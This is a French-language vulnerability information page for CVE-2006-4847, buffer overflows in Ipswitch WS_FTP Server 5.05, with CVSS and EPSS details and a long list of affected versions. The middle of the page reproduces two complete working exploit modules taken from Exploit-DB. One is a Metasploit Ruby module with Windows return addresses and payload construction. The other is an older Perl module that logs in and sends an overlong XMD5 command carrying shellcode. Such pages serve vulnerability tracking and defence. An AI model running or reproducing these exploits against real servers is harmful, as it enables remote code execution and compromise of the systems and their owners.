Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Multiple buffer overflows in Ipswitch WS_FTP Server 5.05 before Hotfix 1 allow remote authenticated users to execute arbitrary code via long (1) XCRC, (2) XSHA1, or (3) XMD5 commands.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 6.5 | AV:N/AC:L/Au:S/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 16717
Date de publication : 2010-04-29 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: wsftp_server_505_xmd5.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Ipswitch WS_FTP Server 5.05 XMD5 Overflow',
'Description' => %q{
This module exploits a buffer overflow in the XMD5 verb in
IPSWITCH WS_FTP Server 5.05.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2006-4847' ],
[ 'OSVDB', '28939' ],
[ 'BID', '20076' ],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663 } ],
[ 'Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 } ],
[ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ],
],
'DisclosureDate' => 'Sep 14 2006',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /WS_FTP Server 5.0.5/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect_login
print_status("Trying target #{target.name}...")
sploit = rand_text_alphanumeric(676, payload_badchars)
sploit << [target.ret].pack('V') + payload.encoded
send_cmd( ['XMD5', sploit] , false)
handler
disconnect
end
end
Exploit Database EDB-ID : 3335
Date de publication : 2007-02-18 23h00 +00:00
Auteur : Jacopo Cervini
EDB Vérifié : Yes
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::wsftp_server_505_xmd5;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'WS-FTP Server 5.05 XMD5 Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' =>
[ 'Jacopo Cervini <acaro [at] jervus.it>',
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'SSL' => [0, 'BOOL', 'Use SSL'],
'USER' => [1, 'DATA', 'Username', 'ftp'],
'PASS' => [1, 'DATA', 'Password', 'ftp'],
},
'Payload' =>
{
'Space' => 329,
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer overflow found in the XMD command
in IPSWITCH WS_FTP Server 5.05.
}),
'Refs' =>
[
['BID', '20076'],
[ 'CVE', '2006-4847' ],
],
'DefaultTarget' => 0,
'Targets' =>
[
['WS-FTP Server 5.05 Universal', 0x1002e636 ], # push esp, ret in LIBEAY32.dll
],
'Keys' => ['wsftp'],
'DisclosureDate' => 'Sep 14 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the NOP module.");
return;
}
my $request = Pex::Text::PatternCreate(676);
$request .= pack("V", $target->[1]);
$request .= $shellcode;
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);
$s->Send("USER ".$self->GetVar('USER')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);
$s->Send("PASS ".$self->GetVar('PASS')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);
$self->PrintLine("[*] Attemping to exploit target '".$target->[0]."'...");
$s->Send("XMD5 $request\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);
sleep(2);
return;
}
# milw0rm.com [2007-02-19]
Products Mentioned
Configuraton 0
Ipswitch>>Ws_ftp_server >> Version 1.0.1eval
Ipswitch>>Ws_ftp_server >> Version 1.0.2eval
Ipswitch>>Ws_ftp_server >> Version 3.0_1
Ipswitch>>Ws_ftp_server >> Version 4.01
Ipswitch>>Ws_ftp_server >> Version 5.02
Ipswitch>>Ws_ftp_server >> Version 5.03
Progress>>Ws_ftp_server >> Version To (including) 5.05
- Progress>>Ws_ftp_server >> Version - (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 1.0.1 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 1.0.1.e (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 1.0.2 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 1.0.2.e (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 1.0.3 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 1.0.4 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 1.0.5 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 2.0 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 2.0.1 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 2.0.2 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 2.0.3 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 2.0.4 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 3.0 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 3.1 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 3.1.1 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 3.1.2 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 3.1.3 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 3.4 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 4.0 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 4.0.1 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 4.0.2 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 5.0.2 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 5.0.3 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 5.0.4 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 5.0.5 (Open CPE detail)
- Progress>>Ws_ftp_server >> Version 5.0.8 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 1.0.1
- Progress>>Ws_ftp_server >> Version 1.0.1 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 1.0.1.e
- Progress>>Ws_ftp_server >> Version 1.0.1.e (Open CPE detail)
Progress>>Ws_ftp_server >> Version 1.0.2
- Progress>>Ws_ftp_server >> Version 1.0.2 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 1.0.2.e
- Progress>>Ws_ftp_server >> Version 1.0.2.e (Open CPE detail)
Progress>>Ws_ftp_server >> Version 1.0.3
- Progress>>Ws_ftp_server >> Version 1.0.3 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 1.0.4
- Progress>>Ws_ftp_server >> Version 1.0.4 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 1.0.5
- Progress>>Ws_ftp_server >> Version 1.0.5 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 2.0
- Progress>>Ws_ftp_server >> Version 2.0 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 2.0.1
- Progress>>Ws_ftp_server >> Version 2.0.1 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 2.0.2
- Progress>>Ws_ftp_server >> Version 2.0.2 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 2.0.3
- Progress>>Ws_ftp_server >> Version 2.0.3 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 2.0.4
- Progress>>Ws_ftp_server >> Version 2.0.4 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 3.0
- Progress>>Ws_ftp_server >> Version 3.0 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 3.1
- Progress>>Ws_ftp_server >> Version 3.1 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 3.1.1
- Progress>>Ws_ftp_server >> Version 3.1.1 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 3.1.2
- Progress>>Ws_ftp_server >> Version 3.1.2 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 3.1.3
- Progress>>Ws_ftp_server >> Version 3.1.3 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 3.4
- Progress>>Ws_ftp_server >> Version 3.4 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 4.0
- Progress>>Ws_ftp_server >> Version 4.0 (Open CPE detail)
Progress>>Ws_ftp_server >> Version 4.0.2
- Progress>>Ws_ftp_server >> Version 4.0.2 (Open CPE detail)
